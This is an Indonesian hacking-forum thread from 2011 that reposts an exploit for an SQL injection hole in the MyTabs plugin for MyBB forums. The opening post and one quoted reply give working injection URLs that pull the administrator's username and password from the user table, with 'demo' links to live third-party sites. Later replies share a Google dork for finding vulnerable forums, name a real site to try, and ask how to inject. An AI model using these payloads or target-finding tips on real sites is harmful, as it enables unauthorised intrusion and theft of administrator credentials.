|
| MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability | |
| | Pengirim | Message |
---|
zer03s Administrator
Jumlah posting : 2471 Points : 4119 Reputation : 113 Join date : 13.12.10 Age : 32 Lokasi : /home/root/blackc0de
| Subyek: MyBB 0day MyTabs (plugin) Blind SQL injection vulnerability Wed Aug 03, 2011 1:10 am | |
| ini exploit temuan di jalan tadi dan masih fresh hati-hati bagi pengguna forum myBB ada exploitnya tuw,,untung ni forum ga pake myBB, pakenya PHPBB jadi amaan cekidot.... - Quote :
- =====================================================================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability ===================================================================== # Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability. # Author: AutoRUN & dR.sqL # Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com # Date : 01 \ 08 \ 2011 # Tested on : Windows XP , Linux # Category : web apps # Software Link : http://mods.mybb.com/view/mytabs # Google dork : Use your mind kid ^_^ !
Vulnerability : $~ http://localhost/mybbpath/index.php?tab=[SQLi] --------------------------------------- # ~ Expl0itation ~ # --------------------------------------- $~ Get the administrator's username (usually it has uid=1) ~ http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- - $~ Get the administrator's password ~ http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- - --------------------------------------- # ~ Demos ~ # --------------------------------------- http://secworm.net/forums/index.php?tab=1' (secworm - Ethical Hacking & IT security forum - ROFL !) http://icanhazcookie.net/index.php?tab=1' _ _ ____ _ _ _ _ _ _ ____ _ / \ _ _| |_ ___ | _ \| | | | \ | | __ _ _ __ __| | __| | _ \ ___ __ _| | / _ \| | | | __/ _ \| |_) | | | | \| | / _` | '_ \ / _` | / _` | |_) | / __|/ _` | | / ___ \ |_| | |_ (_) | _ <| |_| | |\ | | (_| | | | | (_| | | (_| | _ < _\__ \ (_| | |___ /_/ \_\__,_|\__\___/|_| \_\\___/|_| \_| \__,_|_| |_|\__,_| \__,_|_| \_(_)___/\__, |_____| |_| # Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , ssgodfather, DJDukli , b4ti , CroSs HackForums.AL members & All our friends. ____ _ ____ ____ _ _ _ _ _ | _ \ _ __ ___ _ _ __| | |___ \| __ ) / \ | | |__ __ _ _ __ (_) __ _ _ __ | | | |_) | '__/ _ \| | | |/ _` | __) | _ \ / _ \ | | '_ \ / _` | '_ \| |/ _` | '_ \ | | | __/| | | (_) | |_| | (_| | / __/| |_) | / ___ \| | |_) | (_| | | | | | (_| | | | | |_| |_| |_| \___/ \__,_|\__,_| |_____|____/ /_/ \_\_|_.__/ \__,_|_| |_|_|\__,_|_| |_| (_) # 2011 | |
| | | Banditcode Top Nubie
Jumlah posting : 42 Points : 71 Reputation : 2 Join date : 12.08.11
| Subyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Fri Aug 12, 2011 2:33 am | |
| masih banyak yang kena ini hati-hati bagi forum pake myBB | |
| | | iroel Top Nubie
Jumlah posting : 31 Points : 39 Reputation : 0 Join date : 08.07.11
| Subyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Fri Aug 12, 2011 3:51 am | |
| ane kagak tau dorknya pak... | |
| | | nesta VIP Member
Jumlah posting : 810 Points : 896 Reputation : 42 Join date : 04.08.11 Age : 37 Lokasi : depan komputer
| Subyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Fri Aug 12, 2011 4:09 am | |
| | |
| | | zer03s Administrator
Jumlah posting : 2471 Points : 4119 Reputation : 113 Join date : 13.12.10 Age : 32 Lokasi : /home/root/blackc0de
| Subyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Thu Aug 18, 2011 6:26 pm | |
| - nesta wrote:
- kalo gak bisa berarti gak work dunk om?
ane mau nyoba test yang ini -> http://forum.nuruljadid.com/index.php sayang dorknya ga di kasi om cuma di liatin contoh vurln nya aja,, tapi ga tw kalo sudah ada yang pernah coba,, soalnya ane pribadi blom nyobain, bingung nyari dorknya | |
| | | nesta VIP Member
Jumlah posting : 810 Points : 896 Reputation : 42 Join date : 04.08.11 Age : 37 Lokasi : depan komputer
| Subyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Thu Aug 18, 2011 6:46 pm | |
| | |
| | | CyberWild Moderator
Jumlah posting : 1665 Points : 2310 Reputation : 104 Join date : 11.06.11 Age : 43 Lokasi : internet cloud
| Subyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Thu Aug 18, 2011 6:49 pm | |
| - zer03s!!! wrote:
- ini exploit temuan di jalan tadi dan masih fresh
hati-hati bagi pengguna forum myBB ada exploitnya tuw,,untung ni forum ga pake myBB, pakenya PHPBB jadi amaan cekidot....
- Quote :
- =====================================================================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability ===================================================================== # Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability. # Author: AutoRUN & dR.sqL # Home : HackForums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com # Date : 01 \ 08 \ 2011 # Tested on : Windows XP , Linux # Category : web apps # Software Link : http://mods.mybb.com/view/mytabs # Google dork : Use your mind kid ^_^ !
Vulnerability : $~ http://localhost/mybbpath/index.php?tab=[SQLi] --------------------------------------- # ~ Expl0itation ~ # --------------------------------------- $~ Get the administrator's username (usually it has uid=1) ~ http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- - $~ Get the administrator's password ~ http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- - --------------------------------------- # ~ Demos ~ # --------------------------------------- http://secworm.net/forums/index.php?tab=1' (secworm - Ethical Hacking & IT security forum - ROFL !) http://icanhazcookie.net/index.php?tab=1' _ _ ____ _ _ _ _ _ _ ____ _ / \ _ _| |_ ___ | _ \| | | | \ | | __ _ _ __ __| | __| | _ \ ___ __ _| | / _ \| | | | __/ _ \| |_) | | | | \| | / _` | '_ \ / _` | / _` | |_) | / __|/ _` | | / ___ \ |_| | |_ (_) | _ <| |_| | |\ | | (_| | | | | (_| | | (_| | _ < _\__ \ (_| | |___ /_/ \_\__,_|\__\___/|_| \_\\___/|_| \_| \__,_|_| |_|\__,_| \__,_|_| \_(_)___/\__, |_____| |_| # Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , ssgodfather, DJDukli , b4ti , CroSs HackForums.AL members & All our friends. ____ _ ____ ____ _ _ _ _ _ | _ \ _ __ ___ _ _ __| | |___ \| __ ) / \ | | |__ __ _ _ __ (_) __ _ _ __ | | | |_) | '__/ _ \| | | |/ _` | __) | _ \ / _ \ | | '_ \ / _` | '_ \| |/ _` | '_ \ | | | __/| | | (_) | |_| | (_| | / __/| |_) | / ___ \| | |_) | (_| | | | | | (_| | | | | |_| |_| |_| \___/ \__,_|\__,_| |_____|____/ /_/ \_\_|_.__/ \__,_|_| |_|_|\__,_|_| |_| (_) # 2011 nyobain ahkkk | |
| | | kenahack NuuBiiTooL
Jumlah posting : 8 Points : 11 Reputation : 1 Join date : 07.09.11
| Subyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Sat Oct 15, 2011 9:40 am | |
| dork : "Powered by myBB" site:.my target : index.php?tab=1
nyubaan ... inject nya kok ngak ngerti om :D | |
| | | green.day NuuBiiTooL
Jumlah posting : 9 Points : 9 Reputation : 0 Join date : 27.02.12
| Subyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability Mon Feb 27, 2012 9:51 pm | |
| ijin tkp om semoga bisa xixixi | |
| | | Sponsored content
| Subyek: Re: MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability | |
| |
| | | | MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability | |
|
| Permissions in this forum: | Anda tidak dapat menjawab topik
| |
| |
| Latest topics | » Baktrack TutorialSun Jul 28, 2019 2:26 am by kenta » aplikasi gambas pada linuxTue Apr 30, 2019 10:28 am by kenta » beli linux ubuntu terbaru di surabayaSun Mar 31, 2019 10:08 am by kenta » desain robotFri Jan 19, 2018 1:25 pm by kenta » membuat robot tidak susahFri Jan 19, 2018 1:15 pm by kenta » Salam.. Salam.. Salam..Thu Nov 30, 2017 7:42 am by BumiayuKita» teknologi penyaring udara dan airWed Oct 04, 2017 8:41 am by kenta » [CloudMILD] VPS SSD IIX 2X RAM + Xtra SSD SpaceMon Jul 24, 2017 10:46 am by BumiayuKita» cara menutup akses dari situs negatifTue Apr 04, 2017 1:04 pm by kenta » Aplikasi Google TalkMon Mar 20, 2017 3:00 am by BumiayuKita» Driver buat Webcam PC ?? merknya M-Tech,, Fri Jan 30, 2015 8:51 pm by aelgrim » Portal Blog,,,,,Sun Dec 14, 2014 12:38 am by robofics» Appteknodroid - Seputar Dunia AndroidMon Nov 10, 2014 11:32 pm by Pr0phecy » Software animasi yang agan2 pakeTue Sep 30, 2014 1:11 pm by X_campus » INDO BILLING 6.70 + KEYSun Sep 21, 2014 2:17 pm by abdul halim |
Statistics | Total 12294 user terdaftar User terdaftar terakhir adalah Adlygans
Total 31710 kiriman artikel dari user in 5734 subjects
|
Banner Forum | Dukung forum Blackc0de dengan memasang bannernya.
|
Social Networking |
|
|